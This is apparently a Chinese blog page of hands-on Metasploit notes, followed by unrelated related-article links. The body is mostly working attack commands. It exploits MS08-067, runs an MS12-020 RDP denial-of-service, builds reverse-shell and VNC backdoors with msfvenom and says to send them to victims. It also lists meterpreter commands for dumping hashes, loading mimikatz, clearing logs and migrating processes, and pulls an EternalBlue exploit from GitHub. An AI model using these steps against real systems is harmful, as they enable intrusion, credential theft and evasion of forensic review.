show exploit

show payload

msf使用数据库加快搜索,不然每次都等半天

service postgresql start
msfdb reinit
msf > db_rebuild_cache
需要等待几分钟

查询漏洞对应的模块

use exploit/windows/smb/ms08_067_netapi

info 查看漏洞信息

show option 查看配置选项

set target 34    设置目标系统

set payload  windows/meterpreter/reverse_tcp 设置攻击载荷

set lhost 192.168.137.128

set lport 444

攻击失败扫描目标主机是否存在漏洞、

利用nmap和数据库扫描主机

back    回到上一级目录

db_nmap  扫描系统,并且存储在postgrep数据库中

services   查看数据库扫描结果

vulns    查看漏洞主机

攻击失败原因是因为漏洞不存在,因此先扫描是否存在漏洞,再进行攻击

搜索2017漏洞

search选项

Keywords:
  app       :  Modules that are client or server attacks
  author    :  Modules written by this author
  bid       :  Modules with a matching Bugtraq ID
  cve       :  Modules with a matching CVE ID
  edb       :  Modules with a matching Exploit-DB ID
  name      :  Modules with a matching descriptive name
  platform  :  Modules affecting this platform
  ref       :  Modules with a matching ref
  type      :  Modules of a specific type (exploit, auxiliary, or post)

使用 ftp匿名登录扫描模块

auxiliary/scanner/ftp/anonymous

扫描发现metasploitable 是有ftp匿名登录的

使用ms17-010 永恒之蓝漏洞

首先使用分析模块发现主机是否存在漏洞

use auxiliary/scanner/smb/smb_ms17_010

Require 中 yes为必须设置的选项

show missing  查看必须设置的选项

windows系统 远程桌面拒绝服务漏洞

查看漏洞ms12-020对应得模块

使用第二个模块

use auxiliary/scanner/rdp/ms12_020_check

show missing

set rhost 192.168.137.130

扫描是否存在3389拒绝服务攻击(无视防火墙),扫描结果如下

使用第一个模块模块进行攻击

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

set RHOST 192.168.137.130

run

攻击结果

使用payload模块

使用正向模块,攻击者主动去连接目标机

use windows/meterpreter/bind_tcp

RHOST 不是必须的,因为只要到达payload到达对方,就会开启4444端口,可以使用generate 生产后门

-t   指定后缀

-f   指定输出文件名

然后把 a.exe 发给目标主机运行,这边msf run 监听就可以连接shell了

反向shell ,推荐使用这种,因为防火墙大部分都是限制了端口的

use windows/meterpreter/reverse_tcp

使用msfvenom 生成php后门

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.137.128 lport=444 -f raw -o a.php

后门利用

正向连接

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set RHOST 192.168.137.1

run

反向连接

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.137.128

set LPORT 444

run

msfvenom 和 msfconsole里的 generate 是一样的,不过参数有变化

图形界面的后门

1 生成后门

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.137.128 lport=444 -f exe -o vnc.exe

use exploit/multi/handler

set payload windows/vncinject/reverse_tcp

set lport 444

run

2.监听反弹shell

然后将vnc.exe发给目标主机,目标主机一旦运行,就可以获取图形界面了。这个界面只能看不能操作

如果想操作,再原来的模块,options中设置

set viewOnly  FALSE

这个功能要在图形界面运行

meterpterShell

一个很强大的shell

运行在内存,避免硬盘读取操作被取证

传输加密

强大的扩展性可以装载  mimikatz等

[meterpreter命令]  可以使用linux的命令来管理windows系统

help  查看系统

clearev  清除目标的日志

execute  执行目标系统的程序

getprivs  查看当前系统权限

kill    同linux

reg    修改注册表

suspen  暂停进程

getuid  查看登录的用户

getsystem 提权到system用户

hashdump 获取hash值

screenshot 截屏

shell    进入DOS

idletime  查看空闲时间,如果时间比较长,表示目标主机暂时没有人操作

sysinfo  系统信息

getsid  当前服务用户ID

getpid  当前服务的进程号

ps    linux格式查看进程

upload  上传文件

upload /usr/share/windows-binaries/nc.exe  C:\\Users\\Administrator\\Desktop   上传nc文件,注意路径斜杠

download  下载文件

download  123.txt  默认当前路径是在桌面

getwd    获取远程主机当前目录

getlwd    查看当前攻击者主机的目录

load espia  加载截屏模块

screengrab

load mimikatz  加载mimikatz模块

开启远程桌面

run post/windows/manage/enable_rdp

linux下连3389远程桌面

rdesktop 192.168.137.1

关闭远程桌面

通过执行meterpreter Script脚本

/root/.msf4/loot/20180118112336_default_192.168.137.1_host.windows.cle_168896.txt 该文件名是通过在执行开启3389时会显示出来的

转移进程:如果后门进程被kill了,那么我们的meterpreter也会被kill掉

使用migrate转移进程,首先提权

getsystem

migrate -N explorer.exe 转移到桌面进程

在hanlder模块里

show advanced  查看高级选项

set autorunscript migrate -N explorer.exe  一旦session 连接成功自动运行脚本 转移进程号

两个感叹号中,官方建议不要使用meterpreter的 migrate 而是单独使用模块 post/windows/manage/migrate 来执行

导入漏洞利用代码,永恒之蓝

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

要确保WINEPATH  ETERNALBLUEPATH DOUBLEPULSARPATH 三个目录的路径是正确的

.wine需要首次运行一个windows程序才会生成

成功拿到xp的shell

msf的更多相关文章

  1. 免杀后门之MSF&Veil-Evasion的完美结合

    本文由“即刻安全”投稿到“玄魂工作室” Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目.利用它我们可以生成绕过杀软的 payload !kali 上并未安装 ...

  2. 用MSF进行提权

    在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门. ms ...

  3. 现代软件工程 第七章 【MSF】练习与讨论

    7.7  移山开发方法——比TFS敏捷更精简 几个软件学院的学生来请教阿超,同学们自豪地说,我们要用全套TFS敏捷开发模式开发项目! 真的?阿超不敢相信. 同学: 对!我们要用全5个工作项类型 – 任 ...

  4. [书目20160218]微软软件研发的奥秘:MSF精髓

    目录 第一部分 解决方案交付基础 第1章 什么是MSF,它适合你吗 2 1.1 MSF的历史和起源 2 1.2 为什么是“框架” 3 1.3 MSF有何不同 5 1.4 MSF第四版的要素 5 1.5 ...

  5. msf命令全集

    一.msfconsole ?   帮助菜单 back 从当前环境返回 banner   显示一个MSF banner cd   切换目录 color   颜色转换 connect   连接一个主机 e ...

  6. MSF溢出实战教程

    1.  进入终端,开启MSF相关服务 2.  连接数据库 3.  主机扫描 发现如果有MS08_067漏洞,就可以继续渗透 4.  开始溢出 溢出成功的话 sessions -l         查看 ...

  7. MSF命令 收集

    一.msfconsole ?   帮助菜单 back 从当前环境返回 banner   显示一个MSF banner cd   切换目录 color   颜色转换 connect   连接一个主机 e ...

  8. [转]软件开发过程(CMMI/RUP/XP/MSF)是与非?

    经常看到和听到大家在争论敏捷过程.RUP和CMM 哪个软件开发过程更好或者哪个过程不好,各自都有理由.争论得不亦乐乎......实际上,没有十全十美的过程,也不存在更好的过程.关键是什么样的过程适合自 ...

  9. [转]比较 Rational Unified Process (RUP) 和 Microsoft Solutions Framework (MSF)

      文档选项 将此页作为电子邮件发送 级别: 初级 Sandra Sergi Santos, 软件工程专家, IBM 2007 年 6 月 15 日 本文来自于 Rational Edge:Micro ...

  10. BT5之Metasploit[MSF]连接postgresql数据库

    1,先查看postgresql的端口,默认是自动开启的,端口7337 .   root@bt:~# netstat -tnpl |grep postgres tcp        0      0 1 ...

随机推荐

  1. MySQL数据库入门(建库和建表)--陈远波

    建库.建表 1.建库 (1)SQL语句命令建库: Create database数据库名称  (该方法创建的数据库没有设置编码乱码) 1 2 3 4 5 -- 创建数据库时,设置数据库的编码方式 -- ...

  2. c#全宇宙最牛的编程软件

    c#走的道路!PC,PD,电脑一体,一个账户就可以三合一,可以跨平台的编程,在未来的道路如果微软能一直走下去,那么c#将成为宇宙最牛B的编程软件.

  3. JavaScript实现ZLOGO: 用语法树实现多层循环

    原址: https://zhuanlan.zhihu.com/p/32571516 照例先上演示弱效果图. 演示地址照旧: 代码如下: 开始 循环4次 循环4次 前进50 左转90度 到此为止 右转9 ...

  4. Head First设计模式之抽象工厂模式

    一.定义 给客户端提供一个接口,可以创建多个产品族中的产品对象 ,而且使用抽象工厂模式还要满足一下条件:     1)系统中有多个产品族,而系统一次只可能消费其中一族产品.      2)同属于同一个 ...

  5. openldap 搭建

    环境构建 1)软件安装: yum -y install openldap-servers openldap-clients openldap openldap-devel migrationtools ...

  6. Winform应用程序实现通用遮罩层二

    之前先后发表过:<Winform应用程序实现通用遮罩层>.<Winform应用程序实现通用消息窗口>,这两款遮罩层其实都是基于弹出窗口的,今天为大家分享一个比较简单但界面相对友 ...

  7. Nginx集群之SSL证书的WebApi令牌验证

    目录 1       大概思路... 1 2       Nginx集群之SSL证书的WebApi令牌验证... 1 3       Openssl生成SSL证书... 2 4       编写.NE ...

  8. 前端安全之XSS攻击及防御

    xss攻击是什么 ? XSS攻击类似于SQL注入攻击,攻击之前,我们先找到一个存在XSS漏洞的网站,XSS漏洞分为两种,一种是DOM Based XSS漏洞,另一种是Stored XSS漏洞.理论上, ...

  9. js的onscroll、scrollTop、scrollHeight及window.scroll等方法

    onscroll 解释:当元素的滚动条滚动时触发的事件. onscroll事件貌似任何实体元素都可以绑定,这里的实体元素包括DOM元素.window元素.document元素. 用法即:element ...

  10. 强化学习之Sarsa (时间差分学习)

    上篇文章讲到Q-learning, Sarsa与Q-learning的在决策上是完全相同的,不同之处在于学习的方式上 这次我们用openai gym的Taxi来做演示 Taxi是一个出租车的游戏,把顾 ...